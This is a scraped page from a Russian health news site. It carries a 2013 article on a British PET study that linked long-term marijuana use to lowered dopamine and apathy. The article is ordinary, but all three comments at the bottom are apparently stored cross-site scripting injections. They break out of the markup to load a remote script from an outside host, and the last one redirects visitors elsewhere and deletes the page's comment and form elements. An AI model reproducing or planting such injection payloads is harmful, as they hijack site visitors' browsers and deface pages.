Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему люди, курящие мари...  >>  Почему люди, курящие марихуану, всегда на расслабоне? Это хорошо или плохо? Ученые выяснили!
 
Обратная связь
 

Почему люди, курящие марихуану, всегда на расслабоне? Это хорошо или плохо? Ученые выяснили!

Размер шрифта
14 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Английские ученные исследовали растаманов и выяснили, почему люди, курящие марихуану, всегда на «расслабоне». Оказалось, что долговременное употребление марихуаны приводит к изменению того, как работает мозг.

В качестве испытуемых выступали 38 человек одного возраста и пола. Из них половина регулярно курили травку. Причем начали они в 12-18 лет. В качестве метода исследования ученые использовали ПЭТ – позитронно-эмиссионную томографию. Этот метод позволяет врачам и ученным видеть, как работает мозг, какие центры активизируются и какие вещества выделяются.

Известно, что во время курения травы могут возникать разнообразные психотические симптомы. К их числу можно отнести, например, пугающие мысли о непонятной внешней угрозе и другие причудливые переживания. У здоровых людей такие психозы ассоциированы с повышенной продукцией дофамина в мозге. Удивлению ученых не было предела, когда они обнаружили совершенно противоположное у наркоманов.

Оказалось, что у любителей марихуаны уровень дофамина понижен, и этот эффект особенно выражен у лиц, которые курили много и/или пристрастились к этому сомнительному увлечению в раннем возрасте.

Это открытие объясняет безволие у людей, употребляющих марихуану. Помимо прочего дофамин отвечает за мотивацию и целеустремленность. Чем ниже его уровень, тем больше усилий нужно сделать человеку, чтобы заставить себя совершить поступок. Кроме того дофамин – это гормон, который выделяется в ответ на позитивные события: любовь и сладкое. Этим объясняется то, что после употребления марихуаны людям очень хочется есть. Организм пытается повысить уровень дофамина в крови, чтобы человек не потерял волю окончательно.

В предыдущих исследованиях было показано, что курение продуктов конопли ассоциировано с повышенным риском развития психопатологии, в том числе шизофрении

«Ранее считалось, что марихуана способствует развитию шизофрении посредством стимуляции дофаминовой системы в мозге, однако детально этот феномен никогда не изучался», – отмечает доктор Майкл Блумфилд, глава исследования.

«Прямо скажем, результаты оказались неожиданными. Но, они совпадают с предыдущими исследованиями, показавшими, что дофаминовая система действительно изменяется при длительной наркомании: будь то курение марихуаны или употребление ряда других наркотиков таких как кокаина, амфетамина и других», – говорит Блумфилд. «С другой стороны, результаты нашего исследования очень четко объясняют механизм развития абулического («безвольного») синдрома, который описан у марихуановых наркоманов».

Как будто нужны были еще доказательства вреда наркотиков. Но это важно знать: если ваши друзья или близкие стали безынициативными, заторможенными, безвольными – возможно им нужна ваша помощь, чтобы победить наркотик.

Исследование было проведено в нескольких крупных научных учреждениях Лондона (в их числе – Королевский Колледж), а его результаты были опубликованы в журнале «Биологическая Психиатрия» («Biological Psychiatry»).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Марихуана – лучшее средство для бесплодия!   Не хотите задавить ребенка – ешьте шпинат с яйцами!   За последние десять лет количество ДТП, связанных с марихуаной, увеличилось втрое   Рак яичек  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как студенческая жизнь влияет на здоровье
Что кроме алкоголя убивает печень
Странные сигналы вашего организма

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.